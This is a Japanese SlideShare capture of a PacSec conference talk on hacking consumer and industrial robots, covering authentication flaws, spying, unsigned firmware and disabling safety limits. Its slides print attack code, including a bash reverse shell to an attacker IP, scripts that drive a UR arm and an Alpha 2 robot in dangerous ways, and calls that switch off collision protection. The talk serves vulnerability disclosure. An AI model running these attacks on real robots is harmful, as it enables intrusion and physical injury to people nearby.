SlideShare a Scribd company logo
1	
Skynetが来る前に
ロボットをハックする
Cesar Cerrudo
CTO IOActive Labs (@cesarcer)
Lucas Apa
シニアセキュリティコンサルタント(@lucasapa)
ロボット技術入門
●  最近のロボット技術の導入
●  エコシステム、トポロジー、アーキテクチャ
●  事故と関連インシデント
2
主な家庭用ロボットとビジネス用ロボット
3	
ソフトバンクロボティクス:NAOとPepper
~20000
1億1,400慢ドルの投資
UBTECHロボティクス社:アルファ1Sとアルファ 2
1億ドルの投資
ROBOTIS社:OP2とTHORMANG3
主な家庭用ロボットとビジネス用ロボット
4	
ソフトバンクロボット:NAOとPepper
ATOM Z530 | Atom E3845 QUAD
1 GB RAM | 4 GB RAM
イーサネット, WiFi, BT
Linux 2.6.33-rt31-aldebaran-rt (Nao)
Linux 4.0 (Pepper)
Linux 3.10.72 (Androidタブレット) UBTECHロボティクス社:
アルファ1Sとアルファ 2
Linux 3.10.0 armv71
ROBOTIS社:OP2とTHORMANG3
Intel Atom N2600 / Ubuntu 12.04 LTS
主要な産業用協働ロボット
5	
ユニバーサルロボット社:UR3, UR5, UR10
Rethink Robotics社:Baxter と Sawyer
Linux 3.13.0-68
Java / C++
主要な産業用協働ロボット
6	
UR10 (ユニバーサルロボット社) Baxter (Rethink Robotics社)
モーレイ ロボティクス キッチン
(UR10アーム×2台)
DARPAのALIASロボット(UR3アーム)
主要なロボットコントローラ
7	
アスラテック社:いくつかのロボットは今回のテストの対象になった
V-Sido技術を使っている
ハックされたロボットの動き
8
ハックされたロボットの動き
9
研究のアプローチ
●  脅威のモデル化とリスク評価
●  脆弱性評価
●  リバースエンジニアリング戦略/戦略
1
0
大規模ネットワーク上のロボットを見つける
●  mDNS (マルチキャスト DNS)で簡単に
見つかる
•  NAO/Pepperのデフォルトホスト名
は "nao.local"
•  Baxter/Sawyerのデフォルトホスト名
はシリアル番号+ 「local」
例:“011303P0017.local” もしくは
<ロボット名>.local
•  ユニバーサルロボット社のUR3,
UR5, UR10 のデフォルトホスト名は
"ur.local"
	
1
1
認証/認可の脆弱性
●  Bluetooth, WiFi, イーサネット によるネットワーク接続
●  多くの保護されていないサービス (独自仕様・オープンソース)
○  5つの制御用TCPポートを通じてUniversal Robotsを動かす
○  V-Sido OS は認証が無い(ハード・ソフト インターフェース)
○  UBTech制御ポート
○  ROBOTIS RoboPlus プロトコルは認証が無い
○  Baxter/Sawyer SDK/RSDK シェルはカメラに接続、もしく、動かす
ためのもの
○  Pepper/NAO への攻撃は、ロボットに組み込まれたモジュール
のほとんどにアクセスできる(マイク、ボディーコントロール、
データベース、ネットワーク、カード、VPNシークレット、顔
認識モジュール)、ドキュメントに載っていない関数はリモー
トからコード実行させることができる
○  Pepper 管理用 Web コンソールでの認証バイパス
1
2
Pepper 管理コンソールにおける認証バイパス
1
3	
location ~* /libs/qimessaging/.*/qimessaging.js {
auth_pam "Secure Zone";
auth_pam_service_name "nginx";
}
http://192.168.1.105GET / 200
http://192.168.1.105GET /lib/requirejs/require.js?v=2.0.0 200
http://192.168.1.105GET /js/config.js?v=2.0.0 200
http://192.168.1.105GET /js/main.js?v=1.2.0 200
http://192.168.1.105GET /js/app.js?v=1.2.0 200
http://192.168.1.105GET /libs/qimessaging/1.0/qimessaging.js?v=1.2.0 401 Forbidden
実際の認証処理は
無い!
nginx config file
友人であるロボットを悪のロボットに変える
1
4	
●  人を傷つけるために Alpha2 をハックする
2 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3 connected = sock.connect((HOST, PORT))
4 data = ""
5 print "[!] Sending Protocol HELLO"
7 sock.send("x34x12x12x00x00x00x01x00x00x00x92x01xabx91xa9
xe4xb8xadx73x73x73x73x73x73")
9 time.sleep(2)
10 print "[!] Requesting Available Actions"
12 sock.send("x34x12x07x00x00x00x01x00x00x00x92x03xa0")
13 sock.recv(1000)
14 print "[!] Uploading CHUCKY.UBX"
16 sock.send("x34x12x04x00x00x00x01x00x00x00")
(...)
27 print "[!] Sending Keep-Alive"
28 sock.send("x34x12x04x00x00x00x01x00x00x00")
29 sock.recv(1000)
31 print "[!] Launching CHUCKY"
32 sock.send("x34x12x0fx00x00x00x01x00x00x00x92x05xa8x91xa6Chucky")
33 sock.close()
34 print data
友人であるロボットを悪のロボットに変える
1
5	
●  人を傷つけるために Alpha2 をハックする
○  デモ
友人であるロボットを悪のロボットに変える
1
6	
●  人を傷つけるために Alpha2 をハックする
○  デモ
内部脅威としてのロボット:諜報活動の可能性
1
7	
2台のHDカメラ + 1台の3Dカメラ
(Pepper)
4台のマイク
(NAO)
企業秘密 顔認識 日立の EMIEW2
内部脅威としてのロボット:諜報活動の可能性
1
8	
●  NAO / Pepperをハックしてスパイカメラにする
内部脅威としてのロボット:諜報活動の可能性
1
9	
●  NAO / Pepperをハックしてスパイカメラにする
proxyVideo = ALProxy("ALVideoDevice", IP, PORT)
resolution = vision_definitions.kQVGA
colorSpace = vision_definitions.kRGBColorSpace
imgClient = proxyVideo.subscribe("_client", resolution, colorSpace, 5)
# Select camera.
proxyVideo.setParam(vision_definitions.kCameraSelectID, cameraID)
image = proxyVideo.getImageRemote(imgClient)
motionProxy = ALProxy("ALMotion", IP, PORT)
motionProxy.setStiffnesses("Head", 1.0)
# Example showing a slow, relative move of "HeadYaw".
# Calling this multiple times will move the head further.
names = "HeadYaw"
changes = 1
fractionMaxSpeed = 0.5
motionProxy.changeAngles(names, changes, fractionMaxSpeed)
ALVideoDevice.so
ALMotion.so
update video feed
内部脅威としてのロボット:諜報活動の可能性
2
0	
●  NAO / Pepperをハックしてスパイカメラにする
○  デモ
UBTech のスパイ活動?
2
1	
●  GPS座標をハードコードされた暗号 で
暗号化して送信 (Alpha 1S)
●  GPS座標を暗号せずに送信(Alpha 2)
●  写真自動的にクラウドと同期
●  IMEI と 通信 データを送信 (Mobile app)
●  全ての認識された音声データを送信 (ロー
カルネットワークのIPアドレス宛のみ)
●  ロボットはクラウドからコントロール可能
●  すべては平文で送信☺
人間の安全保護
●  自己衝突センサー
●  外部衝突(人間/物体)
●  責任・法的責任?
“衝突回避の目的は、ロボット、周囲への損害を避けること、そして、
何よりも人々を傷つけるのを避けることです。 このことは腕や台座
が物や人にぶつからないかをロボットの計量センサーで周囲をチェ
ックすることに適用されています。"	
2
2
ユニバーサルロボットの安全保護を無効にする
●  これらのロボットは人を傷つけられるか?
○  低速で動いている時の力は十分に頭蓋骨骨折を起こすこと
ができる。
●  設置に際しては「安全設定」を定義する。
●  力、運動量、速度、工具の向き、境界線などを制限する。すべ
ての設定には「安全なパスワード」が設定される
2
3	
安全装置としての I/O 安全装置としての平面
ユニバーサルロボットの安全保護を攻撃する
2
4	
1.  URダッシュボードサーバー上のリモートバージョンを 確認する。
$	nc	<remoteIP>	29999	
Connected:	Universal	Robots	Dashboard	Server	
PolyscopeVersion	←	command	
3.3.4.310	←	response	(version	disclosure)	
load	installation	notexist	←	command	
File	not	found:	/home/ur/ursys-3.3.4.310/GUI/notexist	←	
response	(base	folder	disclosure)
ユニバーサルロボットの安全保護を攻撃する
2
5	
2.  URのModbus TCPサービスにおけるスタックベース・バッファオーバーフ
ローの脆弱性を攻撃 。Modbus 読み書きの脆弱性(バイナリをrootで実
行) (ASLR/NX)。
arg1	=	"-c"	
arg2	=	"/bin/bash	-i	>&	/dev/tcp/<<myIPAddress>>/8981	0>&1"	
arg0	=	["/bin/bash",	arg1,	arg2]	
execve(*arg0[0],	*arg0,	0)
ユニバーサルロボットの安全保護を攻撃する
2
6
ユニバーサルロボットの安全保護を攻撃する
2
7
ユニバーサルロボットの安全保護を攻撃する
2
8	
3.  すべての安全確保のための一般制限値、ジョイントの制限、境界、
安全装置としてのI/O値を上書きするようにsafety.confを変更する。
4.  チェックサムの計算で衝突を強制し、新しいファイルをアップロ
ードする。設置者が現在のチェックサム値をハードウェアに注意
書きラベルの形で書いているのが一般的なベストプラクティスな
ので、これ利用してチェックサムを偽造する必要が有る。
5.  ロボットを再起動すると安全設定が新しいファイルによって更新
される。そして、プロセスは続く!
>>	python	-c	'	
import	subprocess,	time;		
time.sleep(25);		
subprocess.Popen(["sh	$$basefolder$$/
starturcontrol.sh"],	
shell=True	,close_fds=True)'	&n
ユニバーサルロボットの安全保護を攻撃する
2
9	
6.  新しいインストールファイルをロードする(新しい安全設定)。
7.  UR制御サービスの認証に関する問題を攻撃することで、ロボットを
任意の危険な方法で動かす。
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, 30002))
for x in xrange(50):
q = [random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi)] ← joint positions
a = random.uniform(1, 20) ← joint acceleration
v = random.uniform(1, 20) ← joint speed
payload = "movej("+ str(q) + ", a="+str(a)+", v="+str(v)+")" ← move joints
s.send(payload + "n")
print "[!] Sent", payload
time.sleep(1)
data = s.recv(1024)
s.close()
print("Received", repr(data))
攻撃デモ
3
0
攻撃デモ
3
1
Disabling Pepper/NAO Human Safety Settings (1/2)
●  It is possible to disable all external-collision avoidance
protections by changing the state of the ALMotion module
through the setExternalCollisionProtectionEnabled function.
○  NAO does not require user consent for disabling critical
reflexes
○  Pepper require user consent for disabling critical reflexes
(exploit Auth Bypass in Web Console)
3
2	
Pepper blind spots. Arm speed is reduced
when moving inside these zonesSecurity Distances NAO/Pepper
Disabling Pepper/NAO Human Safety Settings (2/2)
3
3	
"""
This exploit uses the setExternalCollisionProtectionEnabled method.
"""
# Get the service ALMotion.
motion_service = session.service("ALMotion")
# Disables "Move", "LArm" and "RArm" external anti collision
name = "All"
enable = False
motion_service.setExternalCollisionProtectionEnabled(name, enable)
(…)
Security protection can be disabled from the
vulnerable Pepper Web Console.
Disabling Baxter/Sawyer Human Safety Settings
3
4	
●  Arm joint mode: "Torque mode"
○  This control mode should be used with extreme caution,
since this control mode bypasses collision avoidance and
can result in potentially harmful motions.
○  To enable torque mode: publish a JointCommand message
to the joint_command topic for a given arm to set the arm
into the desired control mode and move it (mode 3):
	
$ rostopic pub /robot/limb/<side>/joint_command
baxter_core_msgs/JointCommand "{mode: 3, command: [0.0,
0.01, 0.0, 3.0, 2.55, -1.0, -2.07], names: ['left_w0', 'left_w1',
'left_w2', 'left_e0', 'left_e1', 'left_s0', 'left_s1']}" -r 100
○  Other ways to disable collision avoidance are also
possible
脆弱な研究フレームワーク:ROS
3
5	
●  最も広く使用されているオープンソースフレームワーク。
●  主要な目的は、ロボット工学の研究開発におけるコード
の再利用をサポートすること。
●  多くの 既知のセキュリティ問題
○  認証無し
○  暗号化無し
○  送信者確認無し
●  Ruffin White 氏による Secure ROS (実験的試み)
○  転送の暗号化、ネイティブTLSサポート
○  アクセス制御
○  AppArmorプロセスプロファイル
○  もう開発は行われていない
ROS: 研究 => 製品化
3
6	
MICO
NAV2
Schunk LWA 4P
JACO
HiroNXO
ERLE Plane
REEM
Manipulator
PR2
Pepper
3
7
物理攻撃 – 接続部分を攻撃
3
8	
Baxter and Sawyer はLANポートが
台座に露出している。
ポートからはロボットネットワーク
サービスもしくはModbus TCP機能
への接続が可能。
物理攻撃 – 接続部分を攻撃
3
9	
ユニバーサルロボット社のコントローラ は
USBインターフェースに
ワイヤレスマウス・キーボードを接続可能
物理攻撃 – 接続部分を攻撃
4
0	
Pepper と NAO の頭のプラスチック蓋
は簡単に外すことができLANポートに
アクセスできる。LANポートからロボ
ットねとワークサービスに接続できる。
物理攻撃 – 安全でないストレージ
4
1	
●  リムーバブル・ストレージRemovable storage
○  Alpha 2 はロボットの動きと WiFi パスワードを保存
	generic:/sdcard/ubtech/temp/image # ls -lha
-rw-rw---- 1 root sdcard_rw 10K 2016-11-02 01:10 -943417681 <--- QR
code
drwxrwx--x 2 root sdcard_rw 4.0K 2016-11-02 01:21 .
drwxrwx--x 3 root sdcard_rw 4.0K 2016-11-02 00:40 ..
-rw-rw---- 1 root sdcard_rw 49 2016-11-02 01:21 819289450 <--- QR
code
$platform-tools/adb pull /sdcard/ubtech/temp/image/-943417681
すべてを支配するための1つのハッキング
4
2	
●  ベンダーのクラウドへの攻撃の可能性
○  クラウドからはベンダーがロボットを制
御したりアプリケーションを配信したり
できる。
○  強力なクラタスロボット軍団!
	
Web コントローラがペアリングキーをベンダーに送信
ロボットを殺す
4
3	
private void startSendBin()
{
((AlphaApplication)this.mContext.getApplicationContext()).
getBlueToothManager().addBlueToothInteraction(this.mSe
ndListener);
[..........]
((AlphaApplication)this.mContext.getApplicationContext()).
getBlueToothManager().sendCommand(((AlphaApplication
)this.mContext.getApplicationContext()).getCurrentBluetoot
h().getAddress(), (byte)20, arrayOfByte,
arrayOfByte.length, true);
}
}
●  遠隔操作でロボットを殺す(UBTech / SoftBankの全ての機種)
○  悪質なファームウェアのアップグレード。ファイルの整合性は検証
されない。
○  空中からのアップグレード (Bluetooth/WiFi)
○  マニュアルに無い機能!
○  向上に戻す? ファクトリ・リセット? いくらかかる?
	
Alpha リモート・キル
Pepper/NAOの	ALSystem モジュ
ールはリモートから呼び出して
factoryReset と upgrade (引
数:imageUrl, checksum (nullに
できる)) を出力可能
クラウドサービス - アカウントのハイジャック
4
4	
●  クラウドサービスはロボットを制御
○  アップデートを行い、アプリケーションをインストール・除去
○  カスタマーサポートに連絡し、ファームウェアのイメージを入手
○  クラウドアカウントをロボットに紐づけ・紐づけ解除
署名されていない更新
4
5	
●  ファームウェア/アプリケーションの完全性は無い
○  ROBOTIS-OP2 における署名無しのファームウェアイメージ
○  署名されていないUBTech Alpha (ロボットとアプリケーション
両方) APKによるアップデート
○  ソフトバンクNAO/Pepper におけるNULLのチェックサム
	
printf("nDownloading Bytesum:%2Xn", bytesum);
...
/*--- end download ---*/
r = write(fd, "go 8023000", 10);
r = write(fd, "r", 1);
int wait_count = 0;
char last_char = 0;
while(1)
{
if(kbhit())
{
TxCh = _getch();
if(TxCh == 0x1b)
break;
else if(TxCh == 127) // backspace
TxCh = 0x08; // replace backspace value
r = write(fd, &TxCh, 1); ← writes directly
}
Alpha アプリケーション
アップデート
ROBOTIS OP2 RoboPlus
今日のロボットにおけるセキュリティ問題
●  見つかったこと
○  安全でない通信
○  メモリ破損の問題
○  リモートコード実行の脆弱性
○  ファイル整合性の問題
○  認証の問題
○  認証機能の欠落
○  弱い暗号化
○  ファームウェアのアップデート/アップグレードの問題
○  プライバシー問題
○  文書化されていない機能 (リモートコード実行可能などの脆弱性
も有る)
○  弱いデフォルト設定 (SSHシークレットの共有、パスワード)
○  脆弱なオープンソースのロボットフレームワークとライブラリ
	
4
6
ハックされたロボットがもたらすもの
●  家庭で
○  プライバシー問題, 人的・物的損害
●  ビジネスおよび産業において
○  産業スパイ, 人的・物的損害, 企業・ビジネスネットワーク
への侵入
●  医療および軍事において
○  人間への直接の脅威
4
7
ベンダーの対応
“大変興味深い発見と思う。我々が何か
をなさねばならない対象だ :-)”
(未だ修正無し)
“すべては次のリリースで修正される。”
… 3か月後… “修正不可能だ。” .
(未だ修正無し)
“ありがとう!よくわかった!”
”開発者に責任を持ってコーディングす
るように働きかけ、不適切なロボットの
行動をやめさせる!”
4
8	
(Nfi(未だ修正無し)
xes yet)
世界のロボットセキュリティの向上
●  開発の最初からセキュリティ
●  工場出荷時の復元
●  サプライチェーンの安全確保
●  セキュア・バイ・デフォルト
●  教育
●  脆弱性の開示への対応
●  マーケティング投資を減らしてサイバーセキュリティに
投資 !!!!
4
9
結論
●  ロボットは素晴らしい
●  ロボットは安全ではない
●  人間の安全確保機能が無効化できる
○  現在のロボットは十分な安全を提供できない
●  ロボットは人を殺したり傷つけたりできるし、物も損傷できる
●  研究プロジェクトはセキュリティを追加せずに製品化に移行
●  マーケティングが勝っている
●  これを直ちに解決する必要が有る
5
0
終了
ありがとうございました。
ccerrudo@ioactive.com (@cesarcer)
lucas.apa@ioactive.com (@lucasapa)
5
1

More Related Content

PDF
Yunusov babin 7sins-pres_atm_v4(2)_jp
PPTX
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov
PDF
Solnik secure enclaveprocessor-pacsec-final-jp
PDF
ワイヤレス技術をアタックで検証 by 堀合啓一 - CODE BLUE 2015
PDF
Shusei tomonaga pac_sec_20171026_jp
PPTX
Windows 10 IoT Coreの脅威分析と実施すべきセキュリティ対策 by 和栗直英 - CODE BLUE 2015
PPTX
あなたのAppleにもEFIモンスターはいませんか? by Pedro Vilaça - CODE BLUE 2015
PDF
Dp tf stm32_cubemx0418j
Yunusov babin 7sins-pres_atm_v4(2)_jp
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov
Solnik secure enclaveprocessor-pacsec-final-jp
ワイヤレス技術をアタックで検証 by 堀合啓一 - CODE BLUE 2015
Shusei tomonaga pac_sec_20171026_jp
Windows 10 IoT Coreの脅威分析と実施すべきセキュリティ対策 by 和栗直英 - CODE BLUE 2015
あなたのAppleにもEFIモンスターはいませんか? by Pedro Vilaça - CODE BLUE 2015
Dp tf stm32_cubemx0418j

What's hot (13)

PDF
Exploring the x64
PDF
システムコールフックを使用した攻撃検出
PDF
Miniseminar stm32 l4-iot-kit-updated-101018
PPTX
Cisco ios
PPTX
Cisco ios
PPTX
Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~
PDF
続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~
PDF
ESP8266をはじめよう
PDF
03 後期勉強会一年の部【川合】
PDF
Azureの上におとりを置いて、世界中から攻撃される様子を観察した話
PDF
Bluetoothl-Low-Energy入門講座-part1
PDF
AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験
PDF
ワンコインでIot入門 第二章
Exploring the x64
システムコールフックを使用した攻撃検出
Miniseminar stm32 l4-iot-kit-updated-101018
Cisco ios
Cisco ios
Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~
続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~
ESP8266をはじめよう
03 後期勉強会一年の部【川合】
Azureの上におとりを置いて、世界中から攻撃される様子を観察した話
Bluetoothl-Low-Energy入門講座-part1
AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験
ワンコインでIot入門 第二章
Ad

Similar to Lucas apa pacsec_slides_jp-final (20)

PDF
インメモリーで超高速処理を実現する場合のカギ
PDF
Mt basic as-os_on_danbot
PPTX
AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験
PDF
SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎
PDF
「Turtlebot3の紹介」 ROS Japan UG #10 勉強会
PDF
141125CITBrains
PDF
SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~
PPT
201104016 osc2011 kobe
PDF
131106 01 i-rex2013
PPTX
無線LANでロボットを動かす話
PDF
MeeGo Seminar Winter Porting 20101209
PDF
SigfoxではじめるIoT勉強会
PPTX
Kiso sekkei 01rev03
PDF
Lagopusで試すFirewall
PDF
無線LANでロボットを動かす話
PDF
Androidでロボットを動かそう・すまべん関西201003
PDF
RouterBOARD with OpenFlow
KEY
SEAndroid -AndroidのアーキテクチャとSE化について-
PDF
Lagopusで試すFW
PDF
ハードウェアによる仮想化支援機能を利用したハイパバイザーIPS
インメモリーで超高速処理を実現する場合のカギ
Mt basic as-os_on_danbot
AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験
SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎
「Turtlebot3の紹介」 ROS Japan UG #10 勉強会
141125CITBrains
SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~
201104016 osc2011 kobe
131106 01 i-rex2013
無線LANでロボットを動かす話
MeeGo Seminar Winter Porting 20101209
SigfoxではじめるIoT勉強会
Kiso sekkei 01rev03
Lagopusで試すFirewall
無線LANでロボットを動かす話
Androidでロボットを動かそう・すまべん関西201003
RouterBOARD with OpenFlow
SEAndroid -AndroidのアーキテクチャとSE化について-
Lagopusで試すFW
ハードウェアによる仮想化支援機能を利用したハイパバイザーIPS
Ad

More from PacSecJP (20)

PDF
Kavya racharla ndh-naropanth_fin_jp-final
PDF
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
PDF
Ryder robertson pac-sec skeleton 2017_jp
PDF
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
PDF
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
PDF
Rouault imbert view_alpc_rpc_pacsec_jp
PDF
Rouault imbert alpc_rpc_pacsec
PDF
Di shen pacsec_jp-final
PDF
Di shen pacsec_final
PDF
Anıl kurmuş pacsec3-ja
PDF
Anıl kurmuş pacsec3
PDF
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
PDF
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
PDF
Yunusov babin 7 sins pres atm v2
PDF
Shusei tomonaga pac_sec_20171026
PDF
Kavya racharla ndh-naropanth_fin
PDF
Lucas apa pacsec slides
PDF
Marc schoenefeld grandma‘s old handbag_draft2_ja
PDF
Marc schoenefeld grandma‘s old handbag_draft2
PDF
Kasza smashing the_jars_j-corrected
Kavya racharla ndh-naropanth_fin_jp-final
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson pac-sec skeleton 2017_jp
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Rouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert alpc_rpc_pacsec
Di shen pacsec_jp-final
Di shen pacsec_final
Anıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Yunusov babin 7 sins pres atm v2
Shusei tomonaga pac_sec_20171026
Kavya racharla ndh-naropanth_fin
Lucas apa pacsec slides
Marc schoenefeld grandma‘s old handbag_draft2_ja
Marc schoenefeld grandma‘s old handbag_draft2
Kasza smashing the_jars_j-corrected

Lucas apa pacsec_slides_jp-final